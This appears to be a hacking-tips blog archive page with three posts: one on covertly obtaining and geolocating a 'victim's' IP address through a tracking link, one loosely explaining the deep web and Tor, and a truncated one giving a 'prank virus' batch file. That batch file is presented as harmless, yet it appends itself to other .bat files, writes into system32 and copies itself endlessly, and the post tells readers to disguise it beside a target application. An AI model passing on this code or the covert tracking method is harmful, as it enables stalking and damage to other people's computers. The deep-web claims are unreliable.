Posts

Showing posts from April, 2018

How To Track Someone's Phone Using Their IP Address

Image
EVER FELT THE NEED TO KNOW THE LOCATION OF YOUR FRIEND OR SIBLING OR ANYONE ? WELL THEN, I HAVE A PERFECT METHOD FOR YOU. THE METHOD IS TRACKING YOUR VICTIM USING THEIR PHONES OR LAPTOPS. FOR THIS THE IP ADDRESS OF THE VICTIMS DEVICE IS REQUIRED WHICH CAN BE OBTAINED VERY EASILY AND YOU CAN GEO-LOCATE THE PHONE USING IT'S IP ADDRESS.  STEP 1 :   GO TO THE WEBSITE PROVIDED BELOW, ENTER YOUR EMAIL ID AND GENERATE A LINK. THIS LINK HAS TO BE SEND TO THE VICTIM.                                                                  IP FINDER THE LINK IS DESIGNED IN SUCH A WAY THAT YOU'LL HAVE THE IP ADDRESS EMAILED TO YOU WITHOUT THE VICTIM'S KNOWLEDGE. STEP 2 :      ONCE YOU'VE GOT HOLD OF THE IP ADDRESS. GO TO ANOTHER WEBSITE CALLED                                                             THE IP LOCATOR AND YES YOU HAVE IT, THE CURRENT LOCATION OF YOUR VICTIM.

What is Deep Web and How to access Deep Web

Image
WHAT IS DEEP WEB ?   INTERNET IS BASICALLY LIKE AN ONION WHICH HAS MANY LAYERS ONE OVER THE OTHER. The internet which we use is only about 5-10% I.e the starting one or two or at the most three. Rest 90% remaining is what termed as the deep web. Deep Web cannot be accessed using common browsers and need one special and most trusted browser called Tor.   Deep Web is the main hub of all the hackers world wide s also many secret government organisations, and illegal goods traffickers. You'll find things like banned multimedia to hire-able  Hit-man i.e. Assassins. So always be vigilant and super careful while accessing deep web archives.  ALL THE DEEP WEB LINKS END WITH .onion EXTENSION AND ARE NOT VISIBLE IN COMMON BROWSERS. SOME COMMON DEEP WEB LINKS ARE GIVEN AT THE END OF THIS TUTORIAL. FOR ACCESSING DEEP WEB FOLLOW THE STEPS GIVEN BELOW : STEP 1 :   DOWNLOAD TOR BROWSER FROM ITS OFFICIAL WEBSITE ........   Click Here to Download Tor   .......... STEP 2 :  INS

Steps To Create a Prank Virus

Image
***PLEASE NOTE THIS A TOTALLY HARMLESS ONE TO PULL ON A                                                                                         FRIEND OR FRIENEMY***   SO LETS START :- STEP 1 :  OPEN NOTEPAD  STEP 2 :   TYPE IN OR COPY THE FOLLOWING CODE IN TO NOTE PAD             @echo off echo checking system: echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i #*>c:\windows\system32\autoexec.NT echo VIRUS DETECTED pause echo YOURS FAITHFULLY (***ANY NAME YOU FEEL LIKE PUTTING***) pause :1 dir /s copy c:\tmp.bat c:\doccument~1\%username%\greatgame_%random%.bat goto 1 STEP 3 :   SAVE THIS AS "virus.bat"   MAKE SURE TO CHOOSE THE SAVE TYPE AS ALL FILES. STEP 4:   PLACE THIS FILE WITH THE TARGET APPLICATION AND RENAME IT IF NEEDED STEP 5:    ONE RUNNING THE PROGRAM IT WILL CREATE A NEVER ENDING STREAM OF MINDLESS CODES WHICH CANNOT BE STOPPED EASILY. STEP 6:    IN ORDER